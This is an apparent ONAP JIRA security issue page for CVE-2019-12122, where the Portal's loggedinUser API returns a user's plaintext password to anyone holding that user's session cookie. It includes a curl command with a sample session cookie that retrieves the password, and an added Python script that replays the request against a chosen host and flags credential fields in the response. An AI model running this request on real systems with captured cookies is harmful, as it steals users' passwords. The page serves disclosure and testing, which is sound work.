ONAP JIRA Security Issues
OJSI-65

ONAP Portal allows to retrieve password of currently active user (CVE-2019-12122)

    Details

    • OJSI CVE:
      CVE-2019-12122
    • OJSI Impact Description:

      Title: ONAP Portal allows to retrieve password of currently active user

      Reporter: Krzysztof Opasiak from Samsung

      Products: Portal

      Affects: Dublin and earlier

      Description:

      Krzysztof Opasiak from Samsung reported a vulnerability in Portal. By calling ONAPPORTAL/portalApi/loggedinUser, an attacker who possesses a user's session cookie can retrieve that user's password from the database. All Portal setups are affected.

    • OJSI Grant Project Access:
      OJSI-PORTAL

      Description

      ONAP Portal allows retrieval of a user's password based on the SESSION value stored in
      the Cookie. A call to ONAPPORTAL/portalApi/loggedinUser, which is used to retrieve details
      about the active user, returns not only email addresses and personal data but also the password
      in plain text. The command below retrieves the password of the active user
      based on the session id.

      curl -k -i -H 'Accept: application/json' -H 'Cookie: SESSION=YWNmM2IwNTZ+ZTkzOH40NTM2fmI1MGZ+YTIxMGY3MWZlMDBi' -X GET https://<IP addr>:30225/ONAPPORTAL/portalApi/loggedinUser
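      The following script is an added example, not part of this issue and not ONAP Portal code. It replays the request above with the stdlib and then decides, from the JSON body alone, whether the endpoint is returning a credential to the client. The page does not name the JSON key that carries the password, so the key "loginPwd" in the constructed sample responses is an assumption; the check therefore goes beyond the single field and flags any key that looks like a credential (pwd, password, secret, token) with a non-empty value. Both sample responses are constructed for the example, not captured from a Portal instance.

```python
"""Offline check for the loggedinUser credential-leak pattern (CVE-2019-12122).

Added example; not ONAP Portal code. Field names in the samples are assumptions.
"""
import json
import re
import ssl
import urllib.request

# Key names that would be a credential if echoed back to the browser.
SENSITIVE_KEY = re.compile(r"(pwd|passw(or)?d|secret|token)", re.IGNORECASE)


def find_sensitive_fields(obj, path=""):
    """Walk a decoded JSON document and return [(json_path, value)] for every
    credential-looking key that carries a non-empty value, at any depth."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            child = f"{path}.{key}" if path else key
            if SENSITIVE_KEY.search(key) and value not in (None, "", [], {}):
                hits.append((child, value))
            hits.extend(find_sensitive_fields(value, child))
    elif isinstance(obj, list):
        for i, item in enumerate(obj):
            hits.extend(find_sensitive_fields(item, f"{path}[{i}]"))
    return hits


def leaked_paths(body):
    """JSON paths of leaked credential fields in a loggedinUser response body."""
    return [path for path, _ in find_sensitive_fields(json.loads(body))]


def is_vulnerable(body):
    """True when the response body returns at least one credential field."""
    return bool(leaked_paths(body))


def fetch_loggedin_user(base_url, session_cookie, verify_tls=True):
    """Replay the advisory's request: GET /ONAPPORTAL/portalApi/loggedinUser
    with the SESSION cookie. verify_tls=False mirrors 'curl -k' and is only
    appropriate against a lab instance with a self-signed certificate."""
    req = urllib.request.Request(
        f"{base_url}/ONAPPORTAL/portalApi/loggedinUser",
        headers={"Accept": "application/json",
                 "Cookie": f"SESSION={session_cookie}"},
    )
    ctx = ssl.create_default_context()
    if not verify_tls:
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    with urllib.request.urlopen(req, context=ctx, timeout=10) as resp:
        return resp.read().decode("utf-8")


# Constructed sample responses (assumed shape; "loginPwd" is an assumed key).
LEAKY_RESPONSE = json.dumps({
    "orgUserId": "demo",
    "email": "demo@example.com",
    "loginPwd": "demo123",
    "roles": [{"name": "Portal Admin"}],
})
PATCHED_RESPONSE = json.dumps({
    "orgUserId": "demo",
    "email": "demo@example.com",
    "loginPwd": None,
    "roles": [{"name": "Portal Admin"}],
})


if __name__ == "__main__":
    import sys
    if len(sys.argv) == 3:
        # usage: python check.py https://<IP addr>:30225 <SESSION cookie value>
        body = fetch_loggedin_user(sys.argv[1], sys.argv[2], verify_tls=False)
    else:
        body = LEAKY_RESPONSE
    for path in leaked_paths(body):
        print(f"credential field returned to client: {path}")
    print("VULNERABLE" if is_vulnerable(body) else "not leaking")
```

      Run with no arguments to see the check against the constructed samples; pass a base URL and a SESSION cookie value to exercise a real instance. A clean response after the fix should produce no flagged paths.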


            People

            • Assignee: Manoop Talasila (talasila)
            • Reporter: Krzysztof Opasiak (kopasiak)
            • OJSI Grant Person Access: Robert Bogacki
            • OJSI Grant Person2 Access: Jim Baker
            • Votes: 0
            • Watchers: 3
